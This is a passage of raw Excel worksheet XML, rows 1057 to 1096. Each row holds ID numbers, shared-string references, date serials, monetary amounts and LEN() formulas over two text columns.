        <f>LEN(J1057)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1058" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1058">
        <v>21200</v>
      </c>
      <c r="B1058">
        <v>2835</v>
      </c>
      <c r="C1058" t="s">
        <v>7104</v>
      </c>
      <c r="D1058" t="s">
        <v>11208</v>
      </c>
      <c r="E1058">
        <v>33</v>
      </c>
      <c r="F1058" t="s">
        <v>11209</v>
      </c>
      <c r="G1058" s="1">
        <v>44006</v>
      </c>
      <c r="H1058">
        <v>20000</v>
      </c>
      <c r="I1058" t="s">
        <v>9693</v>
      </c>
      <c r="J1058" t="s">
        <v>9456</v>
      </c>
      <c r="K1058">
        <f>LEN(I1058)</f>
        <v>33</v>
      </c>
      <c r="L1058">
        <f>LEN(J1058)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1059" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1059">
        <v>21201</v>
      </c>
      <c r="B1059">
        <v>2835</v>
      </c>
      <c r="C1059" t="s">
        <v>7104</v>
      </c>
      <c r="D1059" t="s">
        <v>11208</v>
      </c>
      <c r="E1059">
        <v>33</v>
      </c>
      <c r="F1059" t="s">
        <v>11210</v>
      </c>
      <c r="G1059" s="1">
        <v>44006</v>
      </c>
      <c r="H1059">
        <v>20000</v>
      </c>
      <c r="I1059" t="s">
        <v>9693</v>
      </c>
      <c r="J1059" t="s">
        <v>9456</v>
      </c>
      <c r="K1059">
        <f>LEN(I1059)</f>
        <v>33</v>
      </c>
      <c r="L1059">
        <f>LEN(J1059)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1060" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1060">
        <v>21202</v>
      </c>
      <c r="B1060">
        <v>2835</v>
      </c>
      <c r="C1060" t="s">
        <v>7104</v>
      </c>
      <c r="D1060" t="s">
        <v>11208</v>
      </c>
      <c r="E1060">
        <v>33</v>
      </c>
      <c r="F1060" t="s">
        <v>1746</v>
      </c>
      <c r="G1060" s="1">
        <v>44006</v>
      </c>
      <c r="H1060">
        <v>40000</v>
      </c>
      <c r="I1060" t="s">
        <v>9693</v>
      </c>
      <c r="J1060" t="s">
        <v>9456</v>
      </c>
      <c r="K1060">
        <f>LEN(I1060)</f>
        <v>33</v>
      </c>
      <c r="L1060">
        <f>LEN(J1060)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1061" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1061">
        <v>19992</v>
      </c>
      <c r="B1061">
        <v>2576</v>
      </c>
      <c r="C1061" t="s">
        <v>5565</v>
      </c>
      <c r="D1061" t="s">
        <v>10385</v>
      </c>
      <c r="E1061">
        <v>24</v>
      </c>
      <c r="F1061" t="s">
        <v>364</v>
      </c>
      <c r="G1061" s="1">
        <v>43957</v>
      </c>
      <c r="H1061">
        <v>100000</v>
      </c>
      <c r="I1061" t="s">
        <v>10386</v>
      </c>
      <c r="J1061" t="s">
        <v>9456</v>
      </c>
      <c r="K1061">
        <f>LEN(I1061)</f>
        <v>28</v>
      </c>
      <c r="L1061">
        <f>LEN(J1061)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1062" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1062">
        <v>19560</v>
      </c>
      <c r="B1062">
        <v>2545</v>
      </c>
      <c r="C1062" t="s">
        <v>5197</v>
      </c>
      <c r="D1062" t="s">
        <v>10105</v>
      </c>
      <c r="E1062">
        <v>16</v>
      </c>
      <c r="F1062" t="s">
        <v>5199</v>
      </c>
      <c r="G1062" s="1">
        <v>44075</v>
      </c>
      <c r="H1062">
        <v>700000</v>
      </c>
      <c r="I1062" t="s">
        <v>9571</v>
      </c>
      <c r="J1062" t="s">
        <v>9478</v>
      </c>
      <c r="K1062">
        <f>LEN(I1062)</f>
        <v>19</v>
      </c>
      <c r="L1062">
        <f>LEN(J1062)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1063" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1063">
        <v>20483</v>
      </c>
      <c r="B1063">
        <v>759</v>
      </c>
      <c r="C1063" t="s">
        <v>711</v>
      </c>
      <c r="D1063" t="s">
        <v>10745</v>
      </c>
      <c r="E1063">
        <v>29</v>
      </c>
      <c r="F1063" t="s">
        <v>9217</v>
      </c>
      <c r="G1063" s="1">
        <v>43943</v>
      </c>
      <c r="H1063">
        <v>0</v>
      </c>
      <c r="I1063" t="s">
        <v>9571</v>
      </c>
      <c r="J1063" t="s">
        <v>9456</v>
      </c>
      <c r="K1063">
        <f>LEN(I1063)</f>
        <v>19</v>
      </c>
      <c r="L1063">
        <f>LEN(J1063)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1064" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1064">
        <v>20484</v>
      </c>
      <c r="B1064">
        <v>759</v>
      </c>
      <c r="C1064" t="s">
        <v>711</v>
      </c>
      <c r="D1064" t="s">
        <v>10745</v>
      </c>
      <c r="E1064">
        <v>29</v>
      </c>
      <c r="F1064" t="s">
        <v>5434</v>
      </c>
      <c r="G1064" s="1">
        <v>43943</v>
      </c>
      <c r="H1064">
        <v>0</v>
      </c>
      <c r="I1064" t="s">
        <v>9571</v>
      </c>
      <c r="J1064" t="s">
        <v>9456</v>
      </c>
      <c r="K1064">
        <f>LEN(I1064)</f>
        <v>19</v>
      </c>
      <c r="L1064">
        <f>LEN(J1064)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1065" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1065">
        <v>20485</v>
      </c>
      <c r="B1065">
        <v>759</v>
      </c>
      <c r="C1065" t="s">
        <v>711</v>
      </c>
      <c r="D1065" t="s">
        <v>10745</v>
      </c>
      <c r="E1065">
        <v>29</v>
      </c>
      <c r="F1065" t="s">
        <v>10746</v>
      </c>
      <c r="G1065" s="1">
        <v>43943</v>
      </c>
      <c r="H1065">
        <v>0</v>
      </c>
      <c r="I1065" t="s">
        <v>9571</v>
      </c>
      <c r="J1065" t="s">
        <v>9456</v>
      </c>
      <c r="K1065">
        <f>LEN(I1065)</f>
        <v>19</v>
      </c>
      <c r="L1065">
        <f>LEN(J1065)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1066" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1066">
        <v>20486</v>
      </c>
      <c r="B1066">
        <v>759</v>
      </c>
      <c r="C1066" t="s">
        <v>711</v>
      </c>
      <c r="D1066" t="s">
        <v>10745</v>
      </c>
      <c r="E1066">
        <v>29</v>
      </c>
      <c r="F1066" t="s">
        <v>547</v>
      </c>
      <c r="G1066" s="1">
        <v>43943</v>
      </c>
      <c r="H1066">
        <v>0</v>
      </c>
      <c r="I1066" t="s">
        <v>9571</v>
      </c>
      <c r="J1066" t="s">
        <v>9456</v>
      </c>
      <c r="K1066">
        <f>LEN(I1066)</f>
        <v>19</v>
      </c>
      <c r="L1066">
        <f>LEN(J1066)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1067" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1067">
        <v>16900</v>
      </c>
      <c r="B1067">
        <v>379</v>
      </c>
      <c r="C1067" t="s">
        <v>890</v>
      </c>
      <c r="D1067" t="s">
        <v>9560</v>
      </c>
      <c r="E1067">
        <v>12</v>
      </c>
      <c r="F1067" t="s">
        <v>9561</v>
      </c>
      <c r="G1067" s="1">
        <v>43899</v>
      </c>
      <c r="H1067">
        <v>100000</v>
      </c>
      <c r="I1067" t="s">
        <v>9550</v>
      </c>
      <c r="J1067" t="s">
        <v>9456</v>
      </c>
      <c r="K1067">
        <f>LEN(I1067)</f>
        <v>18</v>
      </c>
      <c r="L1067">
        <f>LEN(J1067)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1068" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1068">
        <v>16901</v>
      </c>
      <c r="B1068">
        <v>379</v>
      </c>
      <c r="C1068" t="s">
        <v>890</v>
      </c>
      <c r="D1068" t="s">
        <v>9560</v>
      </c>
      <c r="E1068">
        <v>12</v>
      </c>
      <c r="F1068" t="s">
        <v>9562</v>
      </c>
      <c r="G1068" s="1">
        <v>43899</v>
      </c>
      <c r="H1068">
        <v>100000</v>
      </c>
      <c r="I1068" t="s">
        <v>9550</v>
      </c>
      <c r="J1068" t="s">
        <v>9456</v>
      </c>
      <c r="K1068">
        <f>LEN(I1068)</f>
        <v>18</v>
      </c>
      <c r="L1068">
        <f>LEN(J1068)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1069" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1069">
        <v>16902</v>
      </c>
      <c r="B1069">
        <v>379</v>
      </c>
      <c r="C1069" t="s">
        <v>890</v>
      </c>
      <c r="D1069" t="s">
        <v>9560</v>
      </c>
      <c r="E1069">
        <v>12</v>
      </c>
      <c r="F1069" t="s">
        <v>9563</v>
      </c>
      <c r="G1069" s="1">
        <v>43899</v>
      </c>
      <c r="H1069">
        <v>100000</v>
      </c>
      <c r="I1069" t="s">
        <v>9550</v>
      </c>
      <c r="J1069" t="s">
        <v>9456</v>
      </c>
      <c r="K1069">
        <f>LEN(I1069)</f>
        <v>18</v>
      </c>
      <c r="L1069">
        <f>LEN(J1069)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1070" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1070">
        <v>19312</v>
      </c>
      <c r="B1070">
        <v>361</v>
      </c>
      <c r="C1070" t="s">
        <v>283</v>
      </c>
      <c r="D1070" t="s">
        <v>9915</v>
      </c>
      <c r="E1070">
        <v>12</v>
      </c>
      <c r="F1070" t="s">
        <v>9561</v>
      </c>
      <c r="G1070" s="1">
        <v>43859</v>
      </c>
      <c r="H1070">
        <v>100000</v>
      </c>
      <c r="I1070" t="s">
        <v>9550</v>
      </c>
      <c r="J1070" t="s">
        <v>9456</v>
      </c>
      <c r="K1070">
        <f>LEN(I1070)</f>
        <v>18</v>
      </c>
      <c r="L1070">
        <f>LEN(J1070)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1071" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1071">
        <v>19314</v>
      </c>
      <c r="B1071">
        <v>572</v>
      </c>
      <c r="C1071" t="s">
        <v>180</v>
      </c>
      <c r="D1071" t="s">
        <v>9916</v>
      </c>
      <c r="E1071">
        <v>12</v>
      </c>
      <c r="F1071" t="s">
        <v>9917</v>
      </c>
      <c r="G1071" s="1">
        <v>43868</v>
      </c>
      <c r="H1071">
        <v>100000</v>
      </c>
      <c r="I1071" t="s">
        <v>9550</v>
      </c>
      <c r="J1071" t="s">
        <v>9456</v>
      </c>
      <c r="K1071">
        <f>LEN(I1071)</f>
        <v>18</v>
      </c>
      <c r="L1071">
        <f>LEN(J1071)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1072" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1072">
        <v>19315</v>
      </c>
      <c r="B1072">
        <v>572</v>
      </c>
      <c r="C1072" t="s">
        <v>180</v>
      </c>
      <c r="D1072" t="s">
        <v>9916</v>
      </c>
      <c r="E1072">
        <v>12</v>
      </c>
      <c r="F1072" t="s">
        <v>9437</v>
      </c>
      <c r="G1072" s="1">
        <v>43868</v>
      </c>
      <c r="H1072">
        <v>100000</v>
      </c>
      <c r="I1072" t="s">
        <v>9550</v>
      </c>
      <c r="J1072" t="s">
        <v>9456</v>
      </c>
      <c r="K1072">
        <f>LEN(I1072)</f>
        <v>18</v>
      </c>
      <c r="L1072">
        <f>LEN(J1072)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1073" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1073">
        <v>19316</v>
      </c>
      <c r="B1073">
        <v>572</v>
      </c>
      <c r="C1073" t="s">
        <v>180</v>
      </c>
      <c r="D1073" t="s">
        <v>9916</v>
      </c>
      <c r="E1073">
        <v>12</v>
      </c>
      <c r="F1073" t="s">
        <v>9586</v>
      </c>
      <c r="G1073" s="1">
        <v>43868</v>
      </c>
      <c r="H1073">
        <v>100000</v>
      </c>
      <c r="I1073" t="s">
        <v>9550</v>
      </c>
      <c r="J1073" t="s">
        <v>9456</v>
      </c>
      <c r="K1073">
        <f>LEN(I1073)</f>
        <v>18</v>
      </c>
      <c r="L1073">
        <f>LEN(J1073)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1074" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1074">
        <v>19373</v>
      </c>
      <c r="B1074">
        <v>361</v>
      </c>
      <c r="C1074" t="s">
        <v>283</v>
      </c>
      <c r="D1074" t="s">
        <v>9915</v>
      </c>
      <c r="E1074">
        <v>12</v>
      </c>
      <c r="F1074" t="s">
        <v>9976</v>
      </c>
      <c r="G1074" s="1">
        <v>43859</v>
      </c>
      <c r="H1074">
        <v>100000</v>
      </c>
      <c r="I1074" t="s">
        <v>9550</v>
      </c>
      <c r="J1074" t="s">
        <v>9456</v>
      </c>
      <c r="K1074">
        <f>LEN(I1074)</f>
        <v>18</v>
      </c>
      <c r="L1074">
        <f>LEN(J1074)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1075" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1075">
        <v>19379</v>
      </c>
      <c r="B1075">
        <v>2236</v>
      </c>
      <c r="C1075" t="s">
        <v>5023</v>
      </c>
      <c r="D1075" t="s">
        <v>9978</v>
      </c>
      <c r="E1075">
        <v>11</v>
      </c>
      <c r="F1075" t="s">
        <v>9483</v>
      </c>
      <c r="G1075" s="1">
        <v>43881</v>
      </c>
      <c r="H1075">
        <v>250000</v>
      </c>
      <c r="I1075" t="s">
        <v>9485</v>
      </c>
      <c r="J1075" t="s">
        <v>9456</v>
      </c>
      <c r="K1075">
        <f>LEN(I1075)</f>
        <v>18</v>
      </c>
      <c r="L1075">
        <f>LEN(J1075)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1076" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1076">
        <v>19543</v>
      </c>
      <c r="B1076">
        <v>2058</v>
      </c>
      <c r="C1076" t="s">
        <v>5190</v>
      </c>
      <c r="D1076" t="s">
        <v>10090</v>
      </c>
      <c r="E1076">
        <v>16</v>
      </c>
      <c r="F1076" t="s">
        <v>1746</v>
      </c>
      <c r="G1076" s="1">
        <v>43875</v>
      </c>
      <c r="H1076">
        <v>300000</v>
      </c>
      <c r="I1076" t="s">
        <v>9485</v>
      </c>
      <c r="J1076" t="s">
        <v>9456</v>
      </c>
      <c r="K1076">
        <f>LEN(I1076)</f>
        <v>18</v>
      </c>
      <c r="L1076">
        <f>LEN(J1076)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1077" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1077">
        <v>19544</v>
      </c>
      <c r="B1077">
        <v>2058</v>
      </c>
      <c r="C1077" t="s">
        <v>5190</v>
      </c>
      <c r="D1077" t="s">
        <v>10090</v>
      </c>
      <c r="E1077">
        <v>16</v>
      </c>
      <c r="F1077" t="s">
        <v>9437</v>
      </c>
      <c r="G1077" s="1">
        <v>43875</v>
      </c>
      <c r="H1077">
        <v>700000</v>
      </c>
      <c r="I1077" t="s">
        <v>9485</v>
      </c>
      <c r="J1077" t="s">
        <v>9456</v>
      </c>
      <c r="K1077">
        <f>LEN(I1077)</f>
        <v>18</v>
      </c>
      <c r="L1077">
        <f>LEN(J1077)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1078" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1078">
        <v>19545</v>
      </c>
      <c r="B1078">
        <v>2058</v>
      </c>
      <c r="C1078" t="s">
        <v>5190</v>
      </c>
      <c r="D1078" t="s">
        <v>10090</v>
      </c>
      <c r="E1078">
        <v>16</v>
      </c>
      <c r="F1078" t="s">
        <v>10091</v>
      </c>
      <c r="G1078" s="1">
        <v>43875</v>
      </c>
      <c r="H1078">
        <v>700000</v>
      </c>
      <c r="I1078" t="s">
        <v>9485</v>
      </c>
      <c r="J1078" t="s">
        <v>9456</v>
      </c>
      <c r="K1078">
        <f>LEN(I1078)</f>
        <v>18</v>
      </c>
      <c r="L1078">
        <f>LEN(J1078)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1079" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1079">
        <v>19546</v>
      </c>
      <c r="B1079">
        <v>2058</v>
      </c>
      <c r="C1079" t="s">
        <v>5190</v>
      </c>
      <c r="D1079" t="s">
        <v>10090</v>
      </c>
      <c r="E1079">
        <v>16</v>
      </c>
      <c r="F1079" t="s">
        <v>10092</v>
      </c>
      <c r="G1079" s="1">
        <v>43879</v>
      </c>
      <c r="H1079">
        <v>300000</v>
      </c>
      <c r="I1079" t="s">
        <v>9485</v>
      </c>
      <c r="J1079" t="s">
        <v>9456</v>
      </c>
      <c r="K1079">
        <f>LEN(I1079)</f>
        <v>18</v>
      </c>
      <c r="L1079">
        <f>LEN(J1079)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1080" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1080">
        <v>19547</v>
      </c>
      <c r="B1080">
        <v>2058</v>
      </c>
      <c r="C1080" t="s">
        <v>5190</v>
      </c>
      <c r="D1080" t="s">
        <v>10090</v>
      </c>
      <c r="E1080">
        <v>16</v>
      </c>
      <c r="F1080" t="s">
        <v>9435</v>
      </c>
      <c r="G1080" s="1">
        <v>43875</v>
      </c>
      <c r="H1080">
        <v>150000</v>
      </c>
      <c r="I1080" t="s">
        <v>9485</v>
      </c>
      <c r="J1080" t="s">
        <v>9456</v>
      </c>
      <c r="K1080">
        <f>LEN(I1080)</f>
        <v>18</v>
      </c>
      <c r="L1080">
        <f>LEN(J1080)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1081" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1081">
        <v>20081</v>
      </c>
      <c r="B1081">
        <v>2674</v>
      </c>
      <c r="C1081" t="s">
        <v>5605</v>
      </c>
      <c r="D1081" t="s">
        <v>10459</v>
      </c>
      <c r="E1081">
        <v>12</v>
      </c>
      <c r="F1081" t="s">
        <v>10343</v>
      </c>
      <c r="G1081" s="1">
        <v>44106</v>
      </c>
      <c r="H1081">
        <v>400000</v>
      </c>
      <c r="I1081" t="s">
        <v>9485</v>
      </c>
      <c r="J1081" t="s">
        <v>9456</v>
      </c>
      <c r="K1081">
        <f>LEN(I1081)</f>
        <v>18</v>
      </c>
      <c r="L1081">
        <f>LEN(J1081)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1082" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1082">
        <v>20082</v>
      </c>
      <c r="B1082">
        <v>2674</v>
      </c>
      <c r="C1082" t="s">
        <v>5605</v>
      </c>
      <c r="D1082" t="s">
        <v>10459</v>
      </c>
      <c r="E1082">
        <v>12</v>
      </c>
      <c r="F1082" t="s">
        <v>10460</v>
      </c>
      <c r="G1082" s="1">
        <v>44106</v>
      </c>
      <c r="H1082">
        <v>400000</v>
      </c>
      <c r="I1082" t="s">
        <v>9485</v>
      </c>
      <c r="J1082" t="s">
        <v>9456</v>
      </c>
      <c r="K1082">
        <f>LEN(I1082)</f>
        <v>18</v>
      </c>
      <c r="L1082">
        <f>LEN(J1082)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1083" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1083">
        <v>20083</v>
      </c>
      <c r="B1083">
        <v>2674</v>
      </c>
      <c r="C1083" t="s">
        <v>5605</v>
      </c>
      <c r="D1083" t="s">
        <v>10459</v>
      </c>
      <c r="E1083">
        <v>12</v>
      </c>
      <c r="F1083" t="s">
        <v>10461</v>
      </c>
      <c r="G1083" s="1">
        <v>44106</v>
      </c>
      <c r="H1083">
        <v>400000</v>
      </c>
      <c r="I1083" t="s">
        <v>9485</v>
      </c>
      <c r="J1083" t="s">
        <v>9456</v>
      </c>
      <c r="K1083">
        <f>LEN(I1083)</f>
        <v>18</v>
      </c>
      <c r="L1083">
        <f>LEN(J1083)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1084" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1084">
        <v>20258</v>
      </c>
      <c r="B1084">
        <v>596</v>
      </c>
      <c r="C1084" t="s">
        <v>835</v>
      </c>
      <c r="D1084" t="s">
        <v>10583</v>
      </c>
      <c r="E1084">
        <v>12</v>
      </c>
      <c r="F1084" t="s">
        <v>9459</v>
      </c>
      <c r="G1084" s="1">
        <v>43959</v>
      </c>
      <c r="H1084">
        <v>30000</v>
      </c>
      <c r="I1084" t="s">
        <v>9550</v>
      </c>
      <c r="J1084" t="s">
        <v>9456</v>
      </c>
      <c r="K1084">
        <f>LEN(I1084)</f>
        <v>18</v>
      </c>
      <c r="L1084">
        <f>LEN(J1084)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1085" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1085">
        <v>20464</v>
      </c>
      <c r="B1085">
        <v>1503</v>
      </c>
      <c r="C1085" t="s">
        <v>2539</v>
      </c>
      <c r="D1085" t="s">
        <v>10739</v>
      </c>
      <c r="E1085">
        <v>16</v>
      </c>
      <c r="F1085" t="s">
        <v>3204</v>
      </c>
      <c r="G1085" s="1">
        <v>43942</v>
      </c>
      <c r="H1085">
        <v>60</v>
      </c>
      <c r="I1085" t="s">
        <v>9485</v>
      </c>
      <c r="J1085" t="s">
        <v>9456</v>
      </c>
      <c r="K1085">
        <f>LEN(I1085)</f>
        <v>18</v>
      </c>
      <c r="L1085">
        <f>LEN(J1085)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1086" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1086">
        <v>20465</v>
      </c>
      <c r="B1086">
        <v>1503</v>
      </c>
      <c r="C1086" t="s">
        <v>2539</v>
      </c>
      <c r="D1086" t="s">
        <v>10739</v>
      </c>
      <c r="E1086">
        <v>16</v>
      </c>
      <c r="F1086" t="s">
        <v>9453</v>
      </c>
      <c r="G1086" s="1">
        <v>43942</v>
      </c>
      <c r="H1086">
        <v>60</v>
      </c>
      <c r="I1086" t="s">
        <v>9485</v>
      </c>
      <c r="J1086" t="s">
        <v>9456</v>
      </c>
      <c r="K1086">
        <f>LEN(I1086)</f>
        <v>18</v>
      </c>
      <c r="L1086">
        <f>LEN(J1086)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1087" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1087">
        <v>20466</v>
      </c>
      <c r="B1087">
        <v>1503</v>
      </c>
      <c r="C1087" t="s">
        <v>2539</v>
      </c>
      <c r="D1087" t="s">
        <v>10739</v>
      </c>
      <c r="E1087">
        <v>16</v>
      </c>
      <c r="F1087" t="s">
        <v>547</v>
      </c>
      <c r="G1087" s="1">
        <v>43942</v>
      </c>
      <c r="H1087">
        <v>60</v>
      </c>
      <c r="I1087" t="s">
        <v>9485</v>
      </c>
      <c r="J1087" t="s">
        <v>9456</v>
      </c>
      <c r="K1087">
        <f>LEN(I1087)</f>
        <v>18</v>
      </c>
      <c r="L1087">
        <f>LEN(J1087)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1088" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1088">
        <v>20602</v>
      </c>
      <c r="B1088">
        <v>2784</v>
      </c>
      <c r="C1088" t="s">
        <v>6970</v>
      </c>
      <c r="D1088" t="s">
        <v>10842</v>
      </c>
      <c r="E1088">
        <v>12</v>
      </c>
      <c r="F1088" t="s">
        <v>2236</v>
      </c>
      <c r="G1088" s="1">
        <v>44046</v>
      </c>
      <c r="H1088">
        <v>6000</v>
      </c>
      <c r="I1088" t="s">
        <v>9952</v>
      </c>
      <c r="J1088" t="s">
        <v>9478</v>
      </c>
      <c r="K1088">
        <f>LEN(I1088)</f>
        <v>18</v>
      </c>
      <c r="L1088">
        <f>LEN(J1088)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1089" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1089">
        <v>20782</v>
      </c>
      <c r="B1089">
        <v>2747</v>
      </c>
      <c r="C1089" t="s">
        <v>6915</v>
      </c>
      <c r="D1089" t="s">
        <v>10975</v>
      </c>
      <c r="E1089">
        <v>29</v>
      </c>
      <c r="F1089" t="s">
        <v>6917</v>
      </c>
      <c r="G1089" s="1">
        <v>43985</v>
      </c>
      <c r="H1089">
        <v>60000</v>
      </c>
      <c r="I1089" t="s">
        <v>9485</v>
      </c>
      <c r="J1089" t="s">
        <v>9478</v>
      </c>
      <c r="K1089">
        <f>LEN(I1089)</f>
        <v>18</v>
      </c>
      <c r="L1089">
        <f>LEN(J1089)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1090" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1090">
        <v>20919</v>
      </c>
      <c r="B1090">
        <v>507</v>
      </c>
      <c r="C1090" t="s">
        <v>1335</v>
      </c>
      <c r="D1090" t="s">
        <v>11058</v>
      </c>
      <c r="E1090">
        <v>29</v>
      </c>
      <c r="F1090" t="s">
        <v>11063</v>
      </c>
      <c r="G1090" s="1">
        <v>43977</v>
      </c>
      <c r="H1090">
        <v>10000</v>
      </c>
      <c r="I1090" t="s">
        <v>9550</v>
      </c>
      <c r="J1090" t="s">
        <v>9478</v>
      </c>
      <c r="K1090">
        <f>LEN(I1090)</f>
        <v>18</v>
      </c>
      <c r="L1090">
        <f>LEN(J1090)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1091" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1091">
        <v>21149</v>
      </c>
      <c r="B1091">
        <v>990</v>
      </c>
      <c r="C1091" t="s">
        <v>2847</v>
      </c>
      <c r="D1091" t="s">
        <v>11173</v>
      </c>
      <c r="E1091">
        <v>9</v>
      </c>
      <c r="F1091" t="s">
        <v>11174</v>
      </c>
      <c r="G1091" s="1">
        <v>44088</v>
      </c>
      <c r="H1091">
        <v>100000</v>
      </c>
      <c r="I1091" t="s">
        <v>9550</v>
      </c>
      <c r="J1091" t="s">
        <v>9456</v>
      </c>
      <c r="K1091">
        <f>LEN(I1091)</f>
        <v>18</v>
      </c>
      <c r="L1091">
        <f>LEN(J1091)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1092" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1092">
        <v>21308</v>
      </c>
      <c r="B1092">
        <v>2818</v>
      </c>
      <c r="C1092" t="s">
        <v>7178</v>
      </c>
      <c r="D1092" t="s">
        <v>11285</v>
      </c>
      <c r="E1092">
        <v>12</v>
      </c>
      <c r="F1092" t="s">
        <v>9470</v>
      </c>
      <c r="G1092" s="1">
        <v>44048</v>
      </c>
      <c r="H1092">
        <v>300000</v>
      </c>
      <c r="I1092" t="s">
        <v>9550</v>
      </c>
      <c r="J1092" t="s">
        <v>9456</v>
      </c>
      <c r="K1092">
        <f>LEN(I1092)</f>
        <v>18</v>
      </c>
      <c r="L1092">
        <f>LEN(J1092)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1093" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1093">
        <v>21309</v>
      </c>
      <c r="B1093">
        <v>2818</v>
      </c>
      <c r="C1093" t="s">
        <v>7178</v>
      </c>
      <c r="D1093" t="s">
        <v>11285</v>
      </c>
      <c r="E1093">
        <v>12</v>
      </c>
      <c r="F1093" t="s">
        <v>9437</v>
      </c>
      <c r="G1093" s="1">
        <v>44048</v>
      </c>
      <c r="H1093">
        <v>500000</v>
      </c>
      <c r="I1093" t="s">
        <v>9550</v>
      </c>
      <c r="J1093" t="s">
        <v>9456</v>
      </c>
      <c r="K1093">
        <f>LEN(I1093)</f>
        <v>18</v>
      </c>
      <c r="L1093">
        <f>LEN(J1093)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1094" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1094">
        <v>21310</v>
      </c>
      <c r="B1094">
        <v>2818</v>
      </c>
      <c r="C1094" t="s">
        <v>7178</v>
      </c>
      <c r="D1094" t="s">
        <v>11285</v>
      </c>
      <c r="E1094">
        <v>12</v>
      </c>
      <c r="F1094" t="s">
        <v>11286</v>
      </c>
      <c r="G1094" s="1">
        <v>44048</v>
      </c>
      <c r="H1094">
        <v>400000</v>
      </c>
      <c r="I1094" t="s">
        <v>9550</v>
      </c>
      <c r="J1094" t="s">
        <v>9456</v>
      </c>
      <c r="K1094">
        <f>LEN(I1094)</f>
        <v>18</v>
      </c>
      <c r="L1094">
        <f>LEN(J1094)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1095" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1095">
        <v>21350</v>
      </c>
      <c r="B1095">
        <v>1070</v>
      </c>
      <c r="C1095" t="s">
        <v>16352</v>
      </c>
      <c r="D1095" t="s">
        <v>16353</v>
      </c>
      <c r="E1095">
        <v>26</v>
      </c>
      <c r="F1095" t="s">
        <v>1746</v>
      </c>
      <c r="G1095" s="1">
        <v>44140</v>
      </c>
      <c r="H1095" t="s">
        <v>16239</v>
      </c>
      <c r="I1095" t="s">
        <v>9485</v>
      </c>
      <c r="J1095" t="s">
        <v>9456</v>
      </c>
      <c r="K1095">
        <f>LEN(I1095)</f>
        <v>18</v>
      </c>
      <c r="L1095">
        <f>LEN(J1095)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1096" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1096">
        <v>21369</v>
      </c>
      <c r="B1096">
        <v>469</v>
      </c>
      <c r="C1096" t="s">
        <v>1626</v>
      </c>
      <c r="D1096" t="s">
        <v>11336</v>
      </c>
      <c r="E1096">
        <v>12</v>
      </c>
      <c r="F1096" t="s">
        <v>9437</v>
      </c>
      <c r="G1096" s="1">
        <v>44075</v>
